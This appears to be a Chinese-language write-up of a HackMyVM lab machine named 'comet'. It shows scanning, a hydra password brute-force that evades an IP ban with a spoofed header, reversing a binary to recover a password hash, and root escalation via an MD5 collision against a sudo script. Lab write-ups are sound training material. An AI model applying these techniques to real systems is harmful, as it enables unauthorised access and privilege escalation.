![\"image-20240426143550099\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261559055.png\")
<\/div>\n
![\"image-20240426143830512\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404261559056.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ rustscan -a 192.168.0.179 -- -A \n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.179:22\nOpen 192.168.0.179:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-26 02:40 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nInitiating Ping Scan at 02:40\nScanning 192.168.0.179 [2 ports]\nCompleted Ping Scan at 02:40, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 02:40\nCompleted Parallel DNS resolution of 1 host. at 02:40, 0.10s elapsed\nDNS resolution of 1 IPs took 0.10s. Mode: Async [#: 3, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 02:40\nScanning comet (192.168.0.179) [2 ports]\nDiscovered open port 80\/tcp on 192.168.0.179\nDiscovered open port 22\/tcp on 192.168.0.179\nCompleted Connect Scan at 02:40, 0.00s elapsed (2 total ports)\nInitiating Service scan at 02:40\nScanning 2 services on comet (192.168.0.179)\nCompleted Service scan at 02:40, 6.08s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.179.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.36s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNmap scan report for comet (192.168.0.179)\nHost is up, received syn-ack (0.00035s latency).\nScanned at 2024-04-26 02:40:31 EDT for 6s\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)\n| ssh-hostkey: \n| 3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDQGwzNlaaGEELNmSaaA5KPNGnxOCBP8oa7QB1kl8hkIrIGanBlB8e+lifNATIlUM57ReHEaoIiJMZLQlMTATjzQ3g76UxpkRMSfFMfjOwBr3T9xAuggn11GkgapKzgQXop1xpVnpddudlA2DGT56xhfAefOoh9LV\/Sx5gw\/9sH+YpjYZNn4WYrfHuIcvObaa1jE7js8ySeIRQffj5n6wX\/eq7WbohB6yFcLb1PBvnfNhvqgyvwcCWiwZoNhRMa+0ANpdpZyOyKQcbR51w36rmgJI0Y9zLIyjHvtxiNuncns0KFvlnS3JXywv277OvJuqhH4ORvXM9kgSKebGV+\/5R0D\/kFmUA0Q4o1EEkpwzXiiUTLs6j4ZwNojp3iUVWT6Wb7BmnxjeQzG05LXkoavc63aNf+lcSh9mQsepQNo5aHlHzMefPx\/j2zbjQN8CHCxOPWLTcpFlyQSZjjnpGxwYiYyqUZ0sF8l9GWtj6eVgeScGvGy6e0YTPG9\/d6o2oWdMM=\n| 256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFwHzjIh47PVCBqaldJCFibsrsU4ERboGRj1+5RNyV5zFxNTNpdu8f\/rNL9s0p7zkqERtD2xb4zBIl6Vj9Fpdxw=\n| 256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOUM7hNt+CcfC4AKOuJumfdt3GCMSintNt9k0S2tA1XS\n80\/tcp open http syn-ack Apache httpd 2.4.54 ((Debian))\n|_http-title: CyberArray\n|_http-server-header: Apache\/2.4.54 (Debian)\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 02:40\nCompleted NSE at 02:40, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 7.18 seconds<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.179 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.179\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,bak,jpg,txt,html\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html (Status: 403) [Size: 278]\n\/images (Status: 301) [Size: 315] [--> http:\/\/192.168.0.179\/images\/]\n\/index.html (Status: 200) [Size: 7097]\n\/.php (Status: 403) [Size: 278]\n\/contact.html (Status: 200) [Size: 5886]\n\/about.html (Status: 200) [Size: 7024]\n\/blog.html (Status: 200) [Size: 8242]\n\/support.html (Status: 200) [Size: 6329]\n\/login.php (Status: 200) [Size: 1443]\n\/ip.txt (Status: 200) [Size: 0]\n\/js (Status: 301) [Size: 311] [--> http:\/\/192.168.0.179\/js\/]\n\/.html (Status: 403) [Size: 278]\n\/.php (Status: 403) [Size: 278]\n\/server-status (Status: 403) [Size: 278]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240426144234797\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u53d1\u73b0\u7528\u6237owner<\/code>\u3002<\/p>\n<\/div><\/p>\n\u767b\u5f55\u754c\u9762<\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
\u968f\u4fbf\u641e\u4e00\u4e2a\u8d26\u53f7\u5bc6\u7801\u8fdb\u884c\u767b\u5f55\uff0c\u4f46\u662f\u6709\u9632\u62a4\u63aa\u65bd\uff0c\u7b2c\u4e8c\u6b21\u5c31\u88abban\u6389\u4e86\u3002\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ curl http:\/\/192.168.0.179\/ip.txt\n192.168.0.152<\/code><\/pre>\n\u4f3c\u4e4e\u53ea\u5141\u8bb8\u8fd9\u4e2a\u7528\u6237\u8fdb\u884c\u767b\u5f55\uff1f<\/p>\n
\u7206\u7834\u5bc6\u7801<\/h3>\n
\u5c1d\u8bd5\u6293\u5305\uff1a<\/p>\n
POST \/login.php HTTP\/1.1\nHost: 192.168.0.179\nContent-Length: 32\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.0.179\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.0.179\/login.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nusername=admin&password=password<\/code><\/pre>\n\u5c1d\u8bd5\u4f7f\u7528hydra<\/code>\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 192.168.0.179 http-post-form "\/login.php:username=admin&password=^PASS^:H=X-Forwarded-For:192.168.0.152:F=Invalid"\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-26 02:58:24\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/192.168.0.179:80\/login.php:username=admin&password=^PASS^:H=X-Forwarded-For:192.168.0.152:F=Invalid\n[STATUS] 143.00 tries\/min, 143 tries in 00:01h, 14344266 to do in 1671:50h, 6 active\n[ERROR] all children were disabled due too many connection errors\n0 of 1 target completed, 0 valid password found\n[INFO] Writing restore file because 2 server scans could not be completed\n[ERROR] 1 target was disabled because of too many errors\n[ERROR] 1 targets did not complete\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-26 02:59:35<\/code><\/pre>\n\u989d\u3002\u3002\u3002<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ hydra -l admin -P \/usr\/share\/wordlists\/rockyou.txt 192.168.0.179 http-post-form "\/login.php:username=admin&password=^PASS^:H=X-Originating-IP:192.168.0.152:F=Invalid" \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-26 03:01:45\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/192.168.0.179:80\/login.php:username=admin&password=^PASS^:H=X-Originating-IP:192.168.0.152:F=Invalid\n[STATUS] 4546.00 tries\/min, 4546 tries in 00:01h, 14339853 to do in 52:35h, 16 active\n[80][http-post-form] host: 192.168.0.179 login: admin password: solitario\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-26 03:03:05<\/code><\/pre>\n\u6210\u529f\uff01\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
<\/div><\/p>\n\u4e0b\u8f7d\u65e5\u5fd7\u6587\u4ef6<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ for i in {1..51};do wget "http:\/\/192.168.0.179\/logFire\/firewall.log.$i"; done<\/code><\/pre>\n\u7136\u540e\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ cat * \n2023-02-19 16:35:30 172.16.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 172.16.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.0.1 Connection refused from 192.168.0.1\n2023-02-19 16:35:30 172.16.1.1 Connection refused from 192.168.0.1\n2023-02-19 16:35:30 192.168.2.1 Connection refused from 192.168.0.1\n2023-02-19 16:35:30 192.168.0.1 HTTP request to unauthorized URL from 10.0.0.1\n2023-02-19 16:35:30 172.16.0.1 Intrusion attempt from 192.168.0.1\n2023-02-19 16:35:30 10.1.1.1 Intrusion attempt from 192.168.0.1\n2023-02-19 16:35:30 10.0.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.1.1 Intrusion attempt from 192.168.0.1\n2023-02-19 16:35:30 10.0.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.2.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.0.1 Connection refused from 192.168.0.1\n2023-02-19 16:35:30 10.1.1.1 HTTP request to unauthorized URL from 10.0.0.1\n2023-02-19 16:35:30 192.168.1.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 172.16.0.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 172.16.0.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 192.168.2.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 10.0.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 10.0.0.1 Dropped packet from 10.0.0.1 to 192.168.0.1\n2023-02-19 16:35:30 192.168.0.1 HTTP request to unauthorized URL from 10.0.0.1\n2023-02-19 16:35:30 192.168.0.1 Port scan detected from 10.0.0.1\n2023-02-19 16:35:30 192.168.2.1 Dropped packet from 10.0.0.1 to 192.168.0.1<\/code><\/pre>\n\u53d1\u73b0\u5927\u91cf\u91cd\u590d\uff0c\u5c1d\u8bd5\u6392\u5e8f\uff0c\u5e76\u8f93\u51fa\u53ea\u51fa\u73b0\u4e00\u6b21\u7684\u884c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ cat * | sort | uniq -u\n2023-02-19 16:35:31 192.168.1.10 | 192.168.1.50 | Allowed | Inbound connection | Joe<\/code><\/pre>\n\u8fd8\u6709\u4e00\u4e2a\u7279\u6b8a\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ wget http:\/\/192.168.0.179\/logFire\/firewall_update --2024-04-26 03:12:55-- http:\/\/192.168.0.179\/logFire\/firewall_update\nConnecting to 192.168.0.179:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 16248 (16K)\nSaving to: \u2018firewall_update\u2019\n\nfirewall_update 100%[=========================================================================>] 15.87K --.-KB\/s in 0s \n\n2024-04-26 03:12:55 (54.8 MB\/s) - \u2018firewall_update\u2019 saved [16248\/16248]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ file firewall_update \nfirewall_update: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=c8b4cde0414ff49d15473b0d47cde256c7931587, for GNU\/Linux 3.2.0, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ pwn checksec firewall_update\n[*] '\/home\/kali\/temp\/comet\/firewall_update'\n Arch: amd64-64-little\n RELRO: Partial RELRO\n Stack: No canary found\n NX: NX enabled\n PIE: PIE enabled<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/comet]\n\u2514\u2500$ radare2 firewall_update \nWarning: run r2 with -e bin.cache=true to fix relocations in disassembly\n[0x000010b0]> aaa\n[x] Analyze all flags starting with sym. and entry0 (aa)\n[x] Analyze function calls (aac)\n[x] Analyze len bytes of instructions for references (aar)\n[x] Finding and parsing C++ vtables (avrr)\n[x] Type matching analysis for all functions (aaft)\n[x] Propagate noreturn information (aanr)\n[x] Use -AA or aaaa to perform additional experimental analysis.\n[0x000010b0]> pdf\n ;-- section..text:\n ;-- _start:\n ;-- rip:\n\u250c 34: entry0 (int64_t arg3);\n\u2502 ; arg int64_t arg3 @ rdx\n\u2502 0x000010b0 31ed xor ebp, ebp ; [15] -r-x section size 596 named .text\n\u2502 0x000010b2 4989d1 mov r9, rdx ; arg3\n\u2502 0x000010b5 5e pop rsi\n\u2502 0x000010b6 4889e2 mov rdx, rsp\n\u2502 0x000010b9 4883e4f0 and rsp, 0xfffffffffffffff0\n\u2502 0x000010bd 50 push rax\n\u2502 0x000010be 54 push rsp\n\u2502 0x000010bf 4531c0 xor r8d, r8d\n\u2502 0x000010c2 31c9 xor ecx, ecx\n\u2502 0x000010c4 488d3dce0000. lea rdi, [main] ; 0x1199\n\u2502 0x000010cb ff150f2f0000 call qword [reloc.__libc_start_main] ; [0x3fe0:8]=0\n\u2514 0x000010d1 f4 hlt\n[0x000010b0]> s main\n[0x00001199]> pdf\n ; DATA XREF from entry0 @ 0x10c4\n\u250c 363: int main (int argc, char **argv, char **envp);\n\u2502 ; var char *s2 @ rbp-0xf0\n\u2502 ; var char *s1 @ rbp-0xa0\n\u2502 ; var int64_t var_98h @ rbp-0x98\n\u2502 ; var int64_t var_90h @ rbp-0x90\n\u2502 ; var int64_t var_88h @ rbp-0x88\n\u2502 ; var int64_t var_80h @ rbp-0x80\n\u2502 ; var int64_t var_78h @ rbp-0x78\n\u2502 ; var int64_t var_70h @ rbp-0x70\n\u2502 ; var int64_t var_68h @ rbp-0x68\n\u2502 ; var int64_t var_60h @ rbp-0x60\n\u2502 ; var char *s @ rbp-0x50\n\u2502 ; var int64_t var_30h @ rbp-0x30\n\u2502 ; var signed int64_t var_4h @ rbp-0x4\n\u2502 0x00001199 55 push rbp\n\u2502 0x0000119a 4889e5 mov rbp, rsp\n\u2502 0x0000119d 4881ecf00000. sub rsp, 0xf0\n\u2502 0x000011a4 48b862383732. movabs rax, 0x3862613832373862 ; 'b8728ab8'\n\u2502 0x000011ae 48ba31613363. movabs rdx, 0x3139333363336131 ; '1a3c3391'\n\u2502 0x000011b8 48898560ffff. mov qword [s1], rax\n\u2502 0x000011bf 48899568ffff. mov qword [var_98h], rdx\n\u2502 0x000011c6 48b866356636. movabs rax, 0x3933663336663566 ; 'f5f63f39'\n\u2502 0x000011d0 48ba64613732. movabs rdx, 0x3938656532376164 ; 'da72ee89'\n\u2502 0x000011da 48898570ffff. mov qword [var_90h], rax\n\u2502 0x000011e1 48899578ffff. mov qword [var_88h], rdx\n\u2502 0x000011e8 48b866343366. movabs rax, 0x6639613966333466 ; 'f43f9a9f'\n\u2502 0x000011f2 48ba34323962. movabs rdx, 0x6663386362393234 ; '429bc8cf'\n\u2502 0x000011fc 48894580 mov qword [var_80h], rax\n\u2502 0x00001200 48895588 mov qword [var_78h], rdx\n\u2502 0x00001204 48b865383538. movabs rax, 0x3430386638353865 ; 'e858f804'\n\u2502 0x0000120e 48ba38656161. movabs rdx, 0x3162326461616538 ; '8eaad2b1'\n\u2502 0x00001218 48894590 mov qword [var_70h], rax\n\u2502 0x0000121c 48895598 mov qword [var_68h], rdx\n\u2502 0x00001220 c645a000 mov byte [var_60h], 0\n\u2502 0x00001224 488d05d90d00. lea rax, str.Enter_password:_ ; 0x2004 ; "Enter password: "\n\u2502 0x0000122b 4889c7 mov rdi, rax ; const char *format\n\u2502 0x0000122e b800000000 mov eax, 0\n\u2502 0x00001233 e8f8fdffff call sym.imp.printf ; int printf(const char *format)\n\u2502 0x00001238 488d45b0 lea rax, [s]\n\u2502 0x0000123c 4889c6 mov rsi, rax\n\u2502 0x0000123f 488d05cf0d00. lea rax, [0x00002015] ; "%s"\n\u2502 0x00001246 4889c7 mov rdi, rax ; const char *format\n\u2502 0x00001249 b800000000 mov eax, 0\n\u2502 0x0000124e e83dfeffff call sym.imp.__isoc99_scanf ; int scanf(const char *format)\n\u2502 0x00001253 488d45b0 lea rax, [s]\n\u2502 0x00001257 4889c7 mov rdi, rax ; const char *s\n\u2502 0x0000125a e801feffff call sym.imp.strlen ; size_t strlen(const char *s)\n\u2502 0x0000125f 4889c1 mov rcx, rax\n\u2502 0x00001262 488d55d0 lea rdx, [var_30h]\n\u2502 0x00001266 488d45b0 lea rax, [s]\n\u2502 0x0000126a 4889ce mov rsi, rcx\n\u2502 0x0000126d 4889c7 mov rdi, rax\n\u2502 0x00001270 e8dbfdffff call sym.imp.SHA256\n\u2502 0x00001275 c745fc000000. mov dword [var_4h], 0\n\u2502 \u250c\u2500< 0x0000127c eb3c jmp 0x12ba\n\u2502 \u2502 ; CODE XREF from main @ 0x12be\n\u2502 \u250c\u2500\u2500> 0x0000127e 8b45fc mov eax, dword [var_4h]\n\u2502 \u254e\u2502 0x00001281 4898 cdqe\n\u2502 \u254e\u2502 0x00001283 0fb64405d0 movzx eax, byte [rbp + rax - 0x30]\n\u2502 \u254e\u2502 0x00001288 0fb6c0 movzx eax, al\n\u2502 \u254e\u2502 0x0000128b 8b55fc mov edx, dword [var_4h]\n\u2502 \u254e\u2502 0x0000128e 01d2 add edx, edx\n\u2502 \u254e\u2502 0x00001290 488d8d10ffff. lea rcx, [s2]\n\u2502 \u254e\u2502 0x00001297 4863d2 movsxd rdx, edx\n\u2502 \u254e\u2502 0x0000129a 4801d1 add rcx, rdx\n\u2502 \u254e\u2502 0x0000129d 89c2 mov edx, eax ; ...\n\u2502 \u254e\u2502 0x0000129f 488d05720d00. lea rax, str._02x ; 0x2018 ; "%02x"\n\u2502 \u254e\u2502 0x000012a6 4889c6 mov rsi, rax ; const char *format\n\u2502 \u254e\u2502 0x000012a9 4889cf mov rdi, rcx ; char *s\n\u2502 \u254e\u2502 0x000012ac b800000000 mov eax, 0\n\u2502 \u254e\u2502 0x000012b1 e8bafdffff call sym.imp.sprintf ; int sprintf(char *s, const char *format, ...)\n\u2502 \u254e\u2502 0x000012b6 8345fc01 add dword [var_4h], 1\n\u2502 \u254e\u2502 ; CODE XREF from main @ 0x127c\n\u2502 \u254e\u2514\u2500> 0x000012ba 837dfc1f cmp dword [var_4h], 0x1f\n\u2502 \u2514\u2500\u2500< 0x000012be 7ebe jle 0x127e\n\u2502 0x000012c0 488d9510ffff. lea rdx, [s2]\n\u2502 0x000012c7 488d8560ffff. lea rax, [s1]\n\u2502 0x000012ce 4889d6 mov rsi, rdx ; const char *s2\n\u2502 0x000012d1 4889c7 mov rdi, rax ; const char *s1\n\u2502 0x000012d4 e8a7fdffff call sym.imp.strcmp ; int strcmp(const char *s1, const char *s2)\n\u2502 0x000012d9 85c0 test eax, eax\n\u2502 \u250c\u2500< 0x000012db 7511 jne 0x12ee\n\u2502 \u2502 0x000012dd 488d05390d00. lea rax, str.Firewall_successfully_updated ; 0x201d ; "Firewall successfully updated"\n\u2502 \u2502 0x000012e4 4889c7 mov rdi, rax ; const char *s\n\u2502 \u2502 0x000012e7 e854fdffff call sym.imp.puts ; int puts(const char *s)\n\u2502 \u250c\u2500\u2500< 0x000012ec eb0f jmp 0x12fd\n\u2502 \u2502\u2502 ; CODE XREF from main @ 0x12db\n\u2502 \u2502\u2514\u2500> 0x000012ee 488d05460d00. lea rax, str.Incorrect_password ; 0x203b ; "Incorrect password"\n\u2502 \u2502 0x000012f5 4889c7 mov rdi, rax ; const char *s\n\u2502 \u2502 0x000012f8 e843fdffff call sym.imp.puts ; int puts(const char *s)\n\u2502 \u2502 ; CODE XREF from main @ 0x12ec\n\u2502 \u2514\u2500\u2500> 0x000012fd b800000000 mov eax, 0\n\u2502 0x00001302 c9 leave\n\u2514 0x00001303 c3 ret<\/code><\/pre>\n\u53d1\u73b0\u8c03\u7528\u4e86md5<\/code>\uff0c\u5c1d\u8bd5\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\nb8728ab81a3c3391f5f63f39da72ee89f43f9a9f429bc8cfe858f8048eaad2b1<\/code><\/pre>\n<\/div><\/p>\njoe\nprettywoman<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\njoe@comet:~$ sudo -l\nMatching Defaults entries for joe on comet:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser joe may run the following commands on comet:\n (ALL : ALL) NOPASSWD: \/bin\/bash \/home\/joe\/coll\njoe@comet:~$ file \/home\/joe\/coll\n\/home\/joe\/coll: Bourne-Again shell script, ASCII text executable\njoe@comet:~$ cat \/home\/joe\/coll\n#!\/bin\/bash\nexec 2>\/dev\/null\n\nfile1=\/home\/joe\/file1\nfile2=\/home\/joe\/file2\nmd5_1=$(md5sum $file1 | awk '{print $1}')\nmd5_2=$(md5sum $file2 | awk '{print $1}')\n\nif [[ $(head -n 1 $file1) == "HMV" ]] && \n [[ $(head -n 1 $file2) == "HMV" ]] && \n [[ $md5_1 == $md5_2 ]] && \n [[ $(diff -q $file1 $file2) ]]; then\n chmod +s \/bin\/bash\n exit 0\nelse\n exit 1\nfi\njoe@comet:~$ cat user.txt \ncc32dbc17ec3ddf89f9e6d0991c82616\njoe@comet:~$ ls -la\ntotal 32\ndrwxr-xr-x 3 joe joe 4096 Feb 19 2023 .\ndrwxr-xr-x 3 root root 4096 Feb 19 2023 ..\nlrwxrwxrwx 1 root root 9 Feb 25 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 joe joe 220 Feb 19 2023 .bash_logout\n-rw-r--r-- 1 joe joe 3526 Feb 19 2023 .bashrc\n-rwxr-xr-x 1 root root 366 Feb 19 2023 coll\ndrwxr-xr-x 3 joe joe 4096 Feb 19 2023 .local\n-rw-r--r-- 1 joe joe 807 Feb 19 2023 .profile\n-rwx------ 1 joe joe 33 Feb 19 2023 user.txt<\/code><\/pre>\n\u5bfb\u627e\u4e24\u4e2a\u6587\u4ef6\uff0cmd5<\/code> \u524d\u7f00\u90fd\u662fHMV<\/code>\uff0c\u4e14md5<\/code>\u76f8\u540c\uff1a<\/p>\n\u5728\u5e08\u5085blog\u53d1\u73b0\u53e6\u4e00\u4e2a\u6bd4\u8f83\u65b9\u4fbf\u7684\u5de5\u5177\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ chmod +x md5collgen \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ echo HMV > flag \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ .\/md5collgen flag\nMD5 collision generator v1.5\nby Marc Stevens (http:\/\/www.win.tue.nl\/hashclash\/)\n\nUsing output filenames: 'msg1.bin' and 'msg2.bin'\nUsing prefixfile: 'flag'\nUsing initial value: 66fdfd128fcadfc4946a54c7a85dc86d\n\nGenerating first block: ......\nGenerating second block: S00...........\nRunning time: 3.25897 s\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ ls -la \ntotal 3284\ndrwxr-xr-x 2 kali kali 4096 Apr 26 03:46 .\ndrwx------ 58 kali kali 4096 Apr 26 03:42 ..\n-rw-r--r-- 1 kali kali 4 Apr 26 03:46 flag\n-rwxr-xr-x 1 kali kali 3338360 Apr 26 03:44 md5collgen\n-rw-r--r-- 1 kali kali 192 Apr 26 03:46 msg1.bin\n-rw-r--r-- 1 kali kali 192 Apr 26 03:46 msg2.bin\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/md5collgen]\n\u2514\u2500$ head msg1.bin \nHMV\nB\ufffdw\ufffd'U\ufffdx\ufffd\ufffd\u0135\ufffd\ufffd\ufffdy\ufffd?-\ufffdx>)*\ufffd\ufffd\ufffd \ufffd\ufffd\u00f7\ufffdCY\ufffd!\ufffdVK\ufffd\ufffd\u949c\u0716\ufffd\ufffd\u30ad\\\ufffd\ufffd\ufffd\ufffdw\ufffd\ufffd\/l_\ufffd\ufffd\ufffd\u025b\ufffd!\ufffd1\ufffdv!\ufffdW\ufffd\ufffd 